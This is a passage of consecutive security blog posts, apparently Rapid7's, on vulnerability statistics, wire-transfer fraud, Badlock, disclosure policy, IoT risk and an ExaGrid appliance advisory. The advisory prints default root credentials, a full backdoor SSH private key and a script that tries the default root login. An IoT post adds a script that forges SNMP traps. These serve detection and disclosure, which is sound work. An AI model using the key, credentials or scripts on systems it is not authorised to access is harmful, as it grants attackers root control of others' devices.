Apple jumped up from number 5 in 2014. Microsoft was number 3 and Cisco was number 4. Surprisingly, Oracle (owner of Java) did well this year and took 4th place (they were number 2 last year). Congratulations (?) to Canonical and Novell, as they were not in the top 10 list last year (they were 13th and 15th). So in terms of prioritization, with Apple making a big jump last year, if you have a lot of iOS in your environment, it's definitely time to make sure you've prioritized those assets accordingly.

 

Here's a comparison chart that shows number of vulnerabilities per vendor for 2014 and 2015.

2014vs2015-Vendors.jpg

 

Vulnerabilities Per OS

In 2015, according to the NVD, OS X had the most vulnerabilities, followed by Windows 2012 and Ubuntu Linux.

MostVulnerableOS.jpg

 

Here the most vulnerable Linux distro is Ubuntu; openSUSE is the runner-up, followed by Debian. Interestingly, Windows 7, the most popular desktop OS by usage, is reported to be less vulnerable than Ubuntu. (That may surprise a few people!)

 

Vulnerabilities Per Mobile OS

Picture12.png

 

iPhone OS had the highest number of vulnerabilities published in 2015, with Windows and Android coming after it. 2014 was no different: iPhone OS had the highest number of vulnerabilities, followed by Windows RT and Android.

 

Vulnerabilities Per Application

Picture10.png

Vulnerabilities Per Browser

Picture1.png

IE had the highest number of vulnerabilities in 2015. In 2014, the order of the products with the highest number of vulnerabilities was exactly the same (IE, Chrome, Firefox, Safari).

 

Summary

Given the trends of the past few years reported via the NVD, we should expect more vulnerabilities with higher CVSS scores to be published this year. Moreover, I predict that mobile OSes will be a hot area for security: as more mobile security professionals find and report mobile OS vulnerabilities, we'll see an increase in mobile OS vulnerabilities as well.

 

It’s all about priorities. We only have so many hours in the day and so many resources available to remediate what we can. But if you take intel from something like the NVD and layer it over the visibility you have into your own environment, you can use this information to help build a good to-do list driven by priorities, not fear.

The FBI this week posted an alert showing that "business email compromise" wire transfer scams bled $2.3 billion from businesses between October 2013 and February 2016. A couple of news outlets picked this up, including Brian Krebs.

 

When I was the head of security at a multi-national corporation, this was an issue that came up regularly. There were instances of very aggressive behavior, such as someone calling the call center pretending to be the CEO of one of the country organizations and demanding a $1 million transfer. That was a very bold and very obvious fraud that the call center was able to handle. However, very often these requests came through email, just like the FBI reported.

 

When this happens, the scammer normally uses either a forged email domain very similar to the corporate one, or a subdomain that looks very similar, i.e. yourcom.panyname.com. If your user's client does not render with a fixed-width font, they might be tricked into seeing the forged domain as legitimate, i.e. rnicrosoft.com vs microsoft.com (look closely). Then the header is simply forged. In simple mail clients, like Gmail, you have to take extra steps to see the actual sender domain.
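The rnicrosoft.com trick can even be flagged programmatically. A toy sketch of a homoglyph check (the substitution table is a small, hypothetical sample; real tooling uses much larger ones):

```python
# Toy sketch: flag sender domains that look like, but are not,
# your corporate domain (e.g. "rnicrosoft.com" vs "microsoft.com").
HOMOGLYPHS = {"rn": "m", "vv": "w", "cl": "d", "0": "o", "1": "l"}

def normalize(domain):
    d = domain.lower()
    for lookalike, real in HOMOGLYPHS.items():
        d = d.replace(lookalike, real)
    return d

def is_lookalike(sender_domain, corporate_domain):
    return (sender_domain != corporate_domain
            and normalize(sender_domain) == normalize(corporate_domain))

print(is_lookalike("rnicrosoft.com", "microsoft.com"))  # True
print(is_lookalike("microsoft.com", "microsoft.com"))   # False: exact match
```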

 

 

The emails are usually pretty short and lacking detail, such as:

 

“I need you to immediately produce a wire transfer for $13,000 and sent to the bank listed. I will follow up with you later.

 

Regards,

CEO NAME”

 

And you might have a PDF attachment with banking details. Oddly enough, the PDFs I encountered were never malicious. They had legitimate account details so the wire transfers could be received.

 

Now you might think this is too simple and shouldn’t work. But obviously, it does, to the tune of $2.3 billion. You might ask yourself why, and if you aren’t, I’ll ask it for you. Self, why does this work?

 

Well, consider that you might have a multibillion-dollar corporation located in many countries. If you do business in certain countries, wire transfers are the norm, so wire transfers become part of a normal process for that company. And when someone asks for $13,000, or even as much as $75,000, from a company that posts $4.3 billion in revenue, nobody would even blink an eye.

 

Scammers do a little recon, ask for an amount that is small to the company, and it gets processed. Little risk, high reward.

How would you protect against this?

 

The simplest method is verification of the request. The FBI suggests that a telephone call be placed to verify the request, which is a good practice. They also suggest two factor authentication for email, and limit social media activities, as scammers will do reconnaissance and determine if CEOs are traveling.

 

Krebs points out that some experts rely on technological controls such as DKIM and SPF. While these are things we recommend in our consultancy, they are complex for low-maturity organizations and do require some effort and support. At the end of the day, they don’t actually solve the problem, because the scammers are socially engineering human beings.
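Checking whether a domain publishes an SPF record is at least easy to do. A minimal sketch using the third-party dnspython package (the domain is an example):

```python
# Sketch: print a domain's SPF policy, which is published as a TXT record.
# Requires the third-party dnspython package (pip install dnspython).
import dns.resolver

def spf_record(domain):
    for rdata in dns.resolver.resolve(domain, "TXT"):
        txt = b"".join(rdata.strings).decode()
        if txt.startswith("v=spf1"):
            return txt
    return None

print(spf_record("rapid7.com"))
```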

 

While all of these technology controls are good, we are dealing with humans. The best way to prevent this fraud from occurring is creating simple business processes that are enforced. In security terms, we would call this segregation of duties.

 

The simplest security

 

Simply put, segregation of duties says that no one person or one role should be allowed to execute a business process from start to finish. In the case of wire transfer fraud, for example, one person/role should not be able to create the wire transfer, approve it and execute it. Dividing these duties between two or more persons/roles means more eyes on the situation, and a potential to catch the fraud. A simple process map might look like: Role A creates the request, Role B verifies and approves it, and only then is the transfer executed.

 

 

Ensure that Role A and Role B have proper documentation (evidence) for each step of the request and approval, and you now have a specific security control that easily integrates into a business process. The key to enforcement: making sure every single request follows the chain every single time. No exceptions.
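To make the control concrete, here is a toy sketch of the rule in code; the class and role names are hypothetical:

```python
# Toy model of segregation of duties: the role that creates a wire
# transfer request can never be the role that approves it, and nothing
# executes without an approval on record.
class WireTransfer:
    def __init__(self, amount, requested_by):
        self.amount = amount
        self.requested_by = requested_by
        self.approved_by = None

    def approve(self, approver):
        if approver == self.requested_by:
            raise PermissionError("segregation of duties: requester cannot approve")
        self.approved_by = approver

    def execute(self):
        if self.approved_by is None:
            raise PermissionError("transfer has not been approved")
        print(f"executing ${self.amount:,} transfer")

transfer = WireTransfer(13_000, requested_by="role_a")
transfer.approve("role_b")  # a different role signs off
transfer.execute()          # only runs because approval is on record
```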

 

Now let me tell you about the one that almost made it.

 

There was one instance I dealt with which was one mouse click away from being executed.

 

An email (very similar to the example above) was sent to a director of finance, purportedly from the CEO. The director was busy that day, and filed the email away for processing later. By 4:55 pm or so, she realized she had not acted on the request. As it was almost the end of the day, and wire transfers are not processed by most banks after banking hours, she hurriedly forwarded the email to the wire transfer processor, marked with urgency, and made a call to ensure it was processed immediately. By the time it was picked up and put into the process, banks were closed, so they agreed it would execute first thing the next morning.

 

That evening, a series of emails went back and forth between the approver, who was a simple finance analyst who held very firm to the process, and the requester. Though it had urgency, and people were shouting that it was a request from the CEO, the process prevailed.

 

All this time, no one had thought to actually verify the request; that was not part of the process at the time. But because the approver was uncooperative with the request, it was escalated to the CFO (the CEO was traveling). He suspected it was fraudulent and contacted me. We determined almost immediately that it was fake, just by looking at the email headers. There were other indicators too.

 

I immediately praised everyone involved, and bought them gifts for sticking to the process. The director might have felt ashamed, but I went to her as well and explained that these scams are successful because they count on stress and distraction to occur. These are normal human behaviors, and they sometimes cause us to act erratically. But because we had a firm process that was adhered to, all we lost was time.

 

There’s actually much more to this story, but I’ll save that for future posts.

 

Regardless of your organization's size or structure, you too can put this in place. If you are unsure whether these processes exist, start asking around. Begin with your controllers or comptrollers, or anyone in finance. Ask if you have a process for wire transfers, and if so, what the process is. Get involved; understand how your business does business. This will benefit you in many ways.

 

Other things you can do:

 

  • Join InfraGard, the FBI's partnership with the private sector, which will get you in-depth resources and information. You can also report fraud to IC3, the Internet Crime Complaint Center.
  • Ensure you have a separation of duties policy that is enforced
  • Periodically train / update awareness of these issues with the people involved

 

All these are free, requiring only a time investment, and will go a long way toward avoiding the kind of wire transfer fraud scam the FBI is warning about.

Today is Badlock Day

badlock-not-really.JPG

You may recall that the folks over at badlock.org stated about 20 days ago that April 12 would see patches for "Badlock," a serious vulnerability in the SMB/CIFS protocol that affects both Microsoft Windows and any server running Samba, an open source workalike for SMB/CIFS services. We talked about it back in our Getting Ahead of Badlock post, and hopefully, IT administrators have taken advantage of the pre-release warning to clear their schedules for today's patching activities.

 

For Microsoft shops, this should have been straightforward, since today is also Microsoft Patch Tuesday. Applying critical Microsoft patches is, after all, a pretty predictable event.

 

For administrators of servers that run other operating systems that also happen to offer Samba, we've all had a rough couple of years of (usually) coordinated disclosures and updates around core system libraries, so this event can piggyback on those established procedures.

 

How worried should I be?

While we do recommend you roll out the patches as soon as possible - as we generally do for everything - we don't think Badlock is the Bug To End All Bugs[TM]. In reality, an attacker has to already be in a position to do harm in order to use this, and if they are, there are probably other, worse (or better depending on your point of view) attacks they may leverage.

 

Badlock describes a Man-in-the-Middle (MitM) vulnerability affecting both Samba's implementation of SMB/CIFS (as CVE-2016-2118) and Microsoft's (as CVE-2016-0128). This is NOT a straightforward remote code execution (RCE) vulnerability, so it is unlike MS08-067 or any of the historical RCE issues against SMB/CIFS. More details about Badlock and the related issues can be found over at badlock.org.

 

The most likely attack scenario is an internal user who is in the position of intercepting and modifying network traffic in transit to gain privileges equivalent to the intercepted user. While some SMB/CIFS servers exist on the Internet, this is generally considered poor practice, and should be avoided anyway.

 

What's next?

For Samba administrators, the easy advice is to just patch up now. If you're absolutely sure you're not offering CIFS/SMB over the Internet with Samba, check again. Unintentionally exposed services are the bane of IT security after all, with the porous nature of network perimeters.
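A quick way to sanity-check a host from the outside is simply to see whether TCP 445 answers at all. A minimal sketch (the address is a documentation-range placeholder; point it at your own external addresses):

```python
# Quick-and-dirty sketch: is a host exposing SMB/CIFS (TCP 445)?
import socket

def smb_port_open(host, timeout=2):
    try:
        with socket.create_connection((host, 445), timeout=timeout):
            return True
    except OSError:
        return False

print(smb_port_open("192.0.2.10"))  # placeholder address from TEST-NET-1
```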

 

While you're checking, go ahead and patch, since both private and public exploits will surface eventually. You can bet that exploit developers around the world are poring over the Samba patches now. In fact, you can track public progress over at the Metasploit Pull Request queue, but please keep your comments technically relevant and helpful if you care to pitch in.

 

For Microsoft Windows administrators, Badlock is apparently fixed in MS16-047. While Microsoft merely rates this as "Important," there are plenty of other critically rated issues released today, so IT organizations are advised to use their already-negotiated change windows to test and apply this latest round of patches.

 

Rapid7 will be publishing both Metasploit exploits and Nexpose checks just as soon as we can, and this post will be updated when those are available. These should help IT security practitioners to identify their organizations' threat exposure on both systems that are routinely kept up to date, as well as those systems that are IT's responsibility but are, for whatever reason, outside of IT's direct control.

 

Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Maybe I’m being cynical, but I feel like that may well be the thought that a lot of people have when they hear about two surveys posted online this week to investigate perspectives on vulnerability disclosure and handling. Yet despite my natural cynicism, I believe these surveys are a valuable and important step towards understanding the real status quo around vulnerability disclosure and handling so the actions taken to drive adoption of best practices will be more likely to have impact.

 

Hopefully this blog will explain why I feel this way. Before we get into it, here are the surveys:

 

A little bit of background…

 

In March 2015, the National Telecommunications and Information Administration (NTIA) issued a request for comment to “identify substantive cybersecurity issues that affect the digital ecosystem and digital economic growth where broad consensus, coordinated action, and the development of best practices could substantially improve security for organizations and consumers.” Based on the responses they received, they then announced that they were convening a “multistakeholder process concerning collaboration between security researchers and software and system developers and owners to address security vulnerability disclosure.”

 

This announcement was met by the deafening sound of groaning from the security community, many of whom have already participated in countless multistakeholder processes on this topic. The debate around vulnerability disclosure and handling is not new, and it has a tendency to veer towards the religious, with security researchers on one side, and technology providers on the other. Despite this, there have been a number of good faith efforts to develop best practices so researchers and technology providers can work more productively together, reducing the risk on both sides, as well as for end-users. This work has even resulted in two ISO standards (ISO 29147 & ISO 30111) providing vulnerability disclosure and handling best practices for technology providers and operators. So why did the NTIA receive comments proposing this topic?  And of all the things proposed, why did they pick this as their first topic?

 

In my opinion, it’s for two main, connected reasons.

 

Firstly, despite all the phenomenal work that has gone into developing best practices for vulnerability disclosure and handling, adoption of these practices is still very limited. Rapid7 conducts quite a lot of vulnerability disclosures, either for our own researchers, or on occasion for researchers in the Metasploit community that don’t want to deal with the hassle.  Anecdotally, we reckon we receive a response to these disclosures maybe 20% of the time. The rest of the time, it’s crickets. In fact, at the first meeting of the NTIA process in Berkeley, Art Manion of the CERT Coordination Center commented that they’ve taken to sending registered snail mail as it’s the only way they can be sure a disclosure has been received.  It was hard to tell if that’s a joke or true facts.

 

So adoption still seems to be a challenge, and maybe some people (like me) hope this process can help. Of course, the efforts that went before tried to drive adoption, so why should this one be any different?

 

This brings me to the second of my reasons for this project, namely that the times have changed, and with them the context. In the past five years, we’ve seen a staggering number of breaches reported in the news; we’ve seen high-profile branded vulnerability disclosures dominate headlines and put security on the executive team’s radar. We’ve seen bug bounties starting to be adopted by the more security-minded companies. And importantly, we’ve seen the Government start to pay attention to security research – we’ve seen that in the DMCA exemption recently approved, the FDA post-market guidance being proposed, the FTC’s presence at DEF CON, the Department of Defense’s bug bounty, and of course, in the very fact that the NTIA picked this topic. None of these factors alone creates a turn of the tide, but combined, they just might provide an opportunity for us to take a step forward.

 

And that’s what we’re talking about here – steps. It’s important to remember that complex problems are almost never solved overnight. The work done in this NTIA process builds on work conducted before: for example the development of best practices; the disclosure of vulnerability research; efforts to address or fix those bugs; the adoption of bug bounties. All of these pieces make up a picture that reveals a gradual shift in the culture around vulnerability disclosure and handling. Our efforts, should they yield results, will also not be a panacea, but we hope they will pave the way for other steps forward in the future.

 

OK, but why do we need surveys?

 

As I said above, discussions around this tend to become a little heated, and there’s not always a lot of empathy between the two sides, which doesn’t make for great potential for finding resolution. A lot of this dialogue is fueled by assumptions.

My experience and resulting perspective on this topic stem from having worked on both sides of the fence: first as a reputation manager for tech companies, where my reaction to a vulnerability disclosure would have been to try to kill it with fire; and more recently as someone who has partnered with researchers to get the word out about vulnerabilities, or coordinated Rapid7's efforts to respond to major disclosures in the community. At different points I have responded with indignation on behalf of my tech company client, who I saw as being threatened by those Shady Researcher Types, and later on behalf of my researcher friends, who I have seen threatened by those Evil Corporation Types. I say that somewhat tongue-in-cheek, but I do often hear that kind of dialogue coming from the different groups involved, and much worse besides. There are a lot of stereotypes and assumptions in this discussion, and I find they are rarely all that true.

 

I thought my experience gave me a pretty good handle on the debate and the various points of view I would encounter. I thought I knew the reality behind the hyperbolic discourse, yet I find I am still surprised by the things I hear.

 

For example, it turns out a lot of technology providers (both big and small) don't think of themselves as such, and so they are in the "don't know what they don't know" bucket. It also turns out a lot of technology operators are terrified of being extorted by researchers. I had been told that a few times but initially dismissed it as hyperbole, until an incredibly stressed security professional at a non-profit contacted me asking for help interpreting an inbound message from a researcher. When I looked at the communication from the researcher, I could absolutely understand his concern.

 

On the researcher side, I've been saddened by the number of people who tell me they don't want to disclose findings because they're afraid of legal threats from the vendor. Yet more have told me they see no point in disclosing to vendors because vendors never respond. As I said above, we can relate to that point of view! At the same time, we recently disclosed a vulnerability to Xfinity, and missed disclosing through their preferred reporting route (we disclosed to Xfinity addresses, when their recommendation is to use abuse@comcast.net). When we went public, they pointed this out, and were actually very responsive and engaged regarding the disclosure. We realized that we've become so used to a lack of response from vendors that we stopped pushing ourselves to do everything we can to get one. If we care about reaching the right outcome to improve security – and we do – we can't allow ourselves to become defeatist.

 

My point here is that assumptions may be based on past experience, but that doesn't mean they are always correct, or even still correct in the current context. Assumptions, particularly erroneous ones, undermine our ability to understand the heart of the problem, which reduces our chances of proposing solutions that will work. Assumptions and stereotypes are also clear signs of a lack of empathy. How will we ever achieve any kind of productive collaboration, compromise, or cultural evolution if we aren't able or willing to empathize with each other? I rarely find that anyone is driven by purely nefarious motives, and understanding what actually does motivate them and why is the key to informing and influencing behavior to effect positive change. Even if in some instances it means that it's your own behavior that might change. :)

 

So, about those surveys…

 

The group that developed the surveys – the Awareness and Adoption Group participating in the NTIA process (not NTIA itself) – comprises security researchers, technology providers, civil liberties advocates, policy makers, and vulnerability disclosure veterans and participants. It's a pretty mixed group, and it's unlikely we all have the same goals or priorities in participating, but I've been very impressed and grateful that everyone has made a real effort to listen to and understand each other's points of view. Our goal with the surveys is to do that on a far bigger scale, so we can understand much more about how people think about this topic. Ideally, we will see responses from the technology providers, operators, and security researchers that would not normally participate in something like the NTIA process – they are the vast majority, and we want to understand their (your?!) perspectives. We're hoping you can help us defeat any assumptions we may have; the only hypothesis we hope to prove out here is that we don't know everything and can still learn.

 

So please do take the survey that relates to you, and please share the surveys and encourage others to do likewise:

 

Thank you!

@infosecjen

Recently I transitioned from a Principal Consultant role into a new role at Rapid7 as Research Lead with a focus on IoT technology, and it has been a fascinating challenge. Although I have been conducting research for a number of years – covering everything from format string and buffer overflow research on Windows applications to exploring embedded appliances and hacking multifunction printers (MFPs) – conducting research in the IoT world is truly exciting, and it has taught me to be even more open minded.

 

That is, open minded to the fact that there are people out there attaching technology to everything and anything. (Even toothbrushes.)

 

oralb-bluetooth.png

 

As a security consultant, I have focused most of my research over the last eight years on operational-style attacks, which I have developed and used to compromise systems and data during penetration testing. An operational attack turns the operational features of a device against the device itself.

 

As an example, if you know how to ask nicely, MFPs will often give up Active Directory credentials; or, as recent research has disclosed, network management systems will openly consume SNMP data without questioning its content or where it came from.
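
To make that second example concrete: SNMPv1/v2c traps are unauthenticated UDP datagrams, so anyone who can guess the community string can feed events straight into a network management system. The following is a minimal Python sketch using the third-party pysnmp library – the NMS address and the 'public' community string are placeholders of ours, and this illustrates the protocol weakness in general, not any particular product:

# Send a forged linkDown trap to an NMS. Illustrative only; requires
# 'pip install pysnmp' and authorization to test the target system.
from pysnmp.hlapi import (
    CommunityData, ContextData, NotificationType, ObjectIdentity,
    SnmpEngine, UdpTransportTarget, sendNotification,
)

errorIndication, errorStatus, errorIndex, varBinds = next(
    sendNotification(
        SnmpEngine(),
        CommunityData("public"),                  # often left at the default
        UdpTransportTarget(("192.0.2.50", 162)),  # placeholder NMS address
        ContextData(),
        "trap",
        NotificationType(ObjectIdentity("1.3.6.1.6.3.1.1.5.3")),  # linkDown
    )
)
if errorIndication:
    print(errorIndication)

Nothing in that exchange proves where the trap actually came from, which is exactly the property an operational attack abuses.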

 

IoT research is even cooler, because now I get the chance to expand my experience into a number of new avenues. Historically, I have prided myself on the ability to define the risk around my research and communicate it well. With IoT, I initially shuddered at the question: "How do I define risk?"

 

IoT Risk

In the past, it has been fairly simple to define and explain risk as it relates to operational-style attacks within an enterprise environment, but with IoT technology I initially struggled with the concept. This was mainly because most IoT technologies appear to be consumer-grade products. If someone hacks my toothbrush, they may learn how often I brush my teeth. What is the risk there, and how do I measure it?

 

The truth is, the deeper I head down this rabbit hole called IoT, the more my understanding of risk grows. A prime example of defining such risk was pointed out by Tod Beardsley in his blog post "The Business Impact of Hacked Baby Monitors". At first look, we might easily jump to the conclusion that there is no serious risk to an enterprise business. But on a second take, if a malicious actor can use some innocuous IoT technology to gain a foothold on the home network of one of your employees, they could then potentially pivot onto the corporate network via remote access, such as a VPN. This is a valid risk that can be communicated and should be taken seriously.

 

IoT Research

To better define risk, we need to ensure our research covers all aspects of IoT technology. When researching and testing IoT, researchers can develop a form of tunnel vision in which they focus on the technology from a single point of reference – for example, the device itself.

 

While working on and discussing IoT technology with my peers at Rapid7, I have grown to appreciate the complexity of IoT and its ecosystem. Yes, ecosystem – this is where we consider the entire security picture of IoT, and not just one facet of the technology. This includes the following three categories, and how each of them interacts with and impacts the others. We cannot test one without the others and consider that testing effective. We must test each one, and also test how they affect each other.

 

ecosystem.png

 

With IoT quickly becoming more than just consumer-grade products, we are starting to see more IoT-based technologies migrating into the enterprise environment. If we are ever going to build a secure IoT world, it is critical during our research that all aspects of the ecosystem are addressed.

 

The knowledge we gain from this research can help enterprises better cope with new security risks, make better decisions on technology purchases, and help employees stay safe within their home environments – which in turn leads to better security for our enterprises. Thorough research can also deliver valuable knowledge back to vendors, making it possible to improve product security during the design, creation, and manufacturing of IoT technology, so new vendors and new products are not recreating the same issues over and over.

 

So, as we continue down the road of IoT research, let us focus our efforts on the entire ecosystem. That way we can ensure that our efforts lead to a complete picture and culminate in security improvements within the IoT industry.

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

2016 marks the 15th year that I have been working for myself as an independent information security consultant. People who are interested in working for themselves often ask for my thoughts on what it takes to go out - and stay out - on your own. Early on, I thought it was about business cards and marketing slicks. In fact, I spent so much time, effort, and money on company tchotchkes that I'm confident I could have earned twice as much money in my first year alone had I focused on what was truly important. I soon found out that starting my information security consulting practice wasn't about "things". Instead, I saw the value of networking and surrounding myself with successful people – people from whom I could learn not only about information security but, more importantly, about what it takes to be successful in business.

 

In what ways does this apply to your career in IT and information security? Every way! If you look at the essence of what it takes to be successful in our field, it's not about being a master of the technical stuff. Anyone can learn those things. Sure, some are better than others, but at the end of the day, the technical challenges are not our real challenges. Instead, it's about mastering emotional intelligence, including, among other things, the relationships we have with people who are in a position to both help us and hurt us. The relationships you have with others have an enormous impact on how effective you can be in your job and how far you can go in your career.

 

You certainly don’t have to work for yourself to benefit from this. Whether you work for a large corporation, a small startup, a government agency or a nonprofit, think about who you currently know, and who you should get to know, that can have a positive influence on your IT/security career. It might be a current executive in your own organization. It might be a fellow IT pro, auditor, or entrepreneur you meet at a security conference. It might be the parent of your child’s friend who’s an attorney or a doctor. It might be someone else in the information security field who you could reach out to on LinkedIn to start a dialog with. There are a lot of people – many of whom you probably haven’t thought about – who can help you out in tremendous ways: not to make money off of, but to learn from and collaborate with. This leads me to an important point: whenever you are reaching out and meeting new people, make sure that you are also giving to the other person in some capacity. The last thing anyone wants is someone who uses the relationship and gives nothing in return.

 

Looking back, I should have spent the first few years of my business surrounding myself with people in and around IT, as well as those who were in a position to coach and mentor me into being a better business person. That would have created more opportunities for me early on than anything else. As recently as a few weeks ago, I interacted with a young salesman who was more concerned about whether I had a marketing brochure than with getting to know me and understanding how I might be able to help him with his information security needs (he was hoping to sell my services to his clients). This is a common approach to one’s career: have a beautiful marketing slick or website, and they will come, and buy. If it were that simple, countless people would be super successful in every field. Instead, it takes persistence, year after year. Work on building and maintaining your relationships both inside and outside of your organization, as that’s what will help you succeed the most in your IT and security endeavors long-term.

The following issues affect ExaGrid storage devices running firmware prior to version 4.8 P26:

 

CVE-2016-1560: The web interface ships with default credentials of 'support:support'. This credential confers full control of the device, including running commands as root. In addition, SSH is enabled by default, and remote root login is allowed with a default password of 'inflection'.
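
If you want to verify whether an appliance on your own network is still exposed, a quick check is to attempt the default root login over SSH. The sketch below uses the third-party paramiko library; the host list is a placeholder of ours, and you should only point it at devices you own or are authorized to test:

#!/usr/bin/env python3
# Hedged sketch: checks whether a device still accepts the default root
# SSH password from CVE-2016-1560. Requires 'pip install paramiko'.
import paramiko

HOSTS = ["192.0.2.10"]  # placeholder: your appliance addresses

for host in HOSTS:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, username="root", password="inflection", timeout=5)
        print(f"{host}: VULNERABLE - default root password accepted")
    except paramiko.AuthenticationException:
        print(f"{host}: default password rejected")
    except Exception as exc:
        print(f"{host}: could not test ({exc})")
    finally:
        client.close()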

 

CVE-2016-1561: Two keys are listed in the root user's .ssh/authorized_keys file: one labeled "ExaGrid support key" and one "exagrid-manufacturing-key-20070604". A copy of the private key for the latter authorized key ships on the device in /usr/share/exagrid-keyring/ssh/manufacturing.

 

These issues have been rectified in firmware version 4.8 P26, available from the vendor.

 

Credit

Discovered by James @egyp7 Lee of Rapid7, Inc., and disclosed to the vendor and CERT per Rapid7's disclosure policy.

 

Product Description

ExaGrid provides a series of disk backup appliances based on Linux. The vendor's website states, "ExaGrid's appliances are deduplication storage targets for all industry leading backup applications." In addition, ExaGrid provides several hundred customer testimonials, demonstrating its popularity as a backup solution across several vertical markets.

 

Exploitation

Exploiting the SSH issues requires only a standard SSH client, and exploiting the default web credentials requires only a standard web browser.

 

The SSH private key, which is common to every shipping device, is located on the device at /usr/share/exagrid-keyring/ssh/manufacturing, available to anyone who owns a device or anyone who can download and extract the firmware.

 

In order to facilitate detection of this exposure, the private key is provided below.

 

Fingerprints

MD5: 22:c8:a9:c3:01:a0:17:31:a5:43:f2:70:4a:1c:55:f6

SHA1: 1szdeYNwqO2Jom6rby+RTybD9cA

 

Public Key

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBnZQ+6nhlPX/JnX5i5hXpljJ89bSnnrsSs51hSPuoJGmoKowBddISK7s10AIpO0xAWGcr8PUr2FOjEBbDHqlRxoXF0Ocms9xv3ql9EYUQ5+U+M6BymWhNTFPOs6gFHUl8Bw3t6c+SRKBpfRFB0yzBj9d093gSdfTAFoz+yLo4vRw==
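
To check a key blob against the fingerprints above (or to audit your own authorized_keys entries), you can compute both formats with the Python standard library alone. The helper name below is ours, not part of the advisory; note that base64.b64decode silently discards whitespace left over from line wrapping:

import base64
import hashlib

def ssh_fingerprints(b64_blob):
    # Decode the base64 key material from an "ssh-rsa AAAA..." line.
    raw = base64.b64decode(b64_blob)
    # Colon-separated MD5 hex, as shown in the Fingerprints section above.
    md5_hex = hashlib.md5(raw).hexdigest()
    md5_fp = ":".join(md5_hex[i:i + 2] for i in range(0, len(md5_hex), 2))
    # OpenSSH renders SHA1 fingerprints as unpadded base64 of the digest.
    sha1_fp = base64.b64encode(hashlib.sha1(raw).digest()).rstrip(b"=").decode()
    return md5_fp, sha1_fp

Feeding it the blob from the public key above should reproduce both values listed under Fingerprints.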

 

Private Key

-----BEGIN RSA PRIVATE KEY-----
MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
-----END RSA PRIVATE KEY-----

 

Mitigations

Removing the two backdoor keys from the /root/.ssh/authorized_keys and /root/.ssh/authorized_keys2 files and changing the root user's password will prevent exploitation of the SSH vulnerabilities.
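
As a sketch of that first step, the following Python snippet filters the backdoor entries out of both authorized_keys files. It assumes shell access to the appliance and that the key comments match the labels quoted earlier in this advisory; this is our illustration, not vendor-supplied tooling, so keep a backup of the files before running it:

#!/usr/bin/env python3
# Remove the two backdoor keys from root's authorized_keys files,
# matching on the key comments quoted in the advisory. Run as root.
MARKERS = ("ExaGrid support key", "exagrid-manufacturing-key-20070604")
PATHS = ("/root/.ssh/authorized_keys", "/root/.ssh/authorized_keys2")

for path in PATHS:
    try:
        with open(path) as fh:
            lines = fh.readlines()
    except FileNotFoundError:
        continue  # not every build may carry both files
    kept = [line for line in lines if not any(m in line for m in MARKERS)]
    if len(kept) != len(lines):
        with open(path, "w") as fh:
            fh.writelines(kept)
        print(path, "- removed", len(lines) - len(kept), "backdoor key(s)")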

 

As for the web UI exposure, it appears to be possible to change the password for the 'support' account through the web interface. However, this is likely to break software updates, as the update process uses that account with a hard-coded password.

 

Vendor Response

The vendor has fixed the reported vulnerabilities in firmware version 4.8 P26. Customers are urged to contact their support representative to acquire this firmware update.

 

"ExaGrid prides itself on meeting customer requirements," said Bill Andrews, CEO of ExaGrid. "Security is without question a top priority, and we take any such issues very seriously. When we were informed by Rapid7 of a potential security weakness, we addressed it immediately. We value Rapid7's involvement in identifying security risks since strong security will always be a key customer requirement."

 

Disclosure Timeline

This vulnerability advisory was prepared and released in accordance with Rapid7's disclosure policy.

 

  • Tue, Jan 26, 2016: Initial discovery by James Lee of Rapid7
  • Fri, Jan 29, 2016: Initial contact to vendor
  • Mon, Feb 01, 2016: Response from vendor and details disclosed
  • Tue, Feb 23, 2016: Disclosure to CERT
  • Tue, Mar 08, 2016: Vendor commits to a patch release in March
  • Thu, Mar 24, 2016: Vendor provides an updated firmware image
  • Thu, Apr 07, 2016: Public disclosure and Metasploit module published

A major area of focus in the current cybersecurity policy discussion is how growing adoption of encryption impacts law enforcement and national security, and whether new policies should be developed in response. This post briefly evaluates several potential outcomes of the debate, and provides Rapid7's current position on each.

 

Background

 

Rapid7 has great respect for the work of our law enforcement and intelligence agencies. As a cybersecurity company that constantly strives to protect our clients from cybercrime and industrial espionage, we appreciate law enforcement's role in deterring and prosecuting wrongdoers. We also recognize the critical need for effective technical tools to counter the serious and growing threats to our networks and personal devices. Encryption is one such tool.

 

